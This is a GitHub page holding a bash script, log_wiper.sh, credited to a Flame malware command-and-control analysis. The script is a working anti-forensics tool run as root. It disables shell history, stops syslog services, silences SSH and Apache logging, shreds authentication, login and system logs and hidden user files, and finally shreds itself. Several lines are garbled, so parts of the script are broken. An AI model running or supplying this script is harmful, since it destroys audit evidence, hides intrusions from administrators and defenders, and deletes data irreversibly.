-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathlog_wiper.sh
executable file
·65 lines (55 loc) · 2.24 KB
/
log_wiper.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/bin/bash
# Original source: http://www.securelist.com/en/blog/750/Full_Analysis_of_Flame_s_Command_Control_servers
# Author: Stuxnext/Flame folks
#
# This script will remove all logging present on a Debian based system. Some tweaks
# should be done to make it compatible with other systems, such as those
# that do not support shred.
if [[ $UID -ne 0 ]]; then
echo "This script must be run as root to be completely effective."
exit 1
fi
# Install needed application(s)
apt-get install -y chkconfig
# Stop history
echo "unset HISTFILE" >> /etc/profile
history -c
find ~/.bash_history -exec shred -fvzu -n 3 {} \;
# Stop logging services
service rsyslog stop
chkconfig rsyslog off
service sysklogd stop
chkconfig sysklogd off
service msyslog stop
chkconfigm syslog off
service syslog-ng stop
chkconfig syslog-ng off
# stop logging ssh
cp /etc/ssh/aa
sed -i 's/LogLevel.*/LogLevel QUIET/' /etc/ssh/sshd_config
shred -fvzu -n 3 /var/log/auth.log*
services sh restart
# Delete hidden files
find / -type f -name ".*" | grep -v ".bash_profile" | grep -v ".bashrc" | grep "home" | xargs shred -fvzu -n 3
find / -type f -name ".*" | grep -v ".bash_profile" | grep -v ".bashrc" | grep "root" | xargs shred -fvzu -n 3
# Stop apache2 logging
sed -i 's|ErrorLog [$/a-zA-Z0-9{}_.]*|ErrorLog /dev/null|g' /etc/apache2/sites-available/default
sed -i 's|CustomLog [$/a-zA-Z0-9{}_.]*|CustomLog /dev/null|g' /etc/apache2/sites-available/default
sed -i 's|LogLevel [$/a-zA-Z0-9{}_.]*|LogLevel emerg|g' /etc/apache2/sites-available/default
sed -i 's|ErrorLog [$/a-zA-Z0-9{}_.]*|ErrorLog /dev/null|g' /etc/apache2/sites-available/default-ssl
sed -i 's|CustomLog [$/a-zA-Z0-9{}_.]*|CustomLog /dev/null|g' /etc/apache2/sites-available/default-ssl
sed -i 's|LogLevel [$/a-zA-Z0-9{}_.]*|LogLevel emerg|g' /etc/apache2/sites-available/default-ssl
shred -fvzu -n 3 /var/log/apache2/*
service apache2 restart
# Delete various log files
shred -fvzu -n 3 /var/log/wtmp &
shred -fvzu -n 3 /var/log/lastlog &
shred -fvzu -n 3 /var/run/utmp &
shred -fvzu -n 3 /var/log/mail.* &
shred -fvzu -n 3 /var/log/syslog* &
shred -fvzu -n 3 /var/log/messages* &
shred -fvzu -n 3 /var/log/*.log &
shred -fvzu -n 3 /var/log/*/*.log &
# Self delete
find ./ -type f | grep $0 | xargs -I {} shred -fvzu -n 3 {} \;
exit 0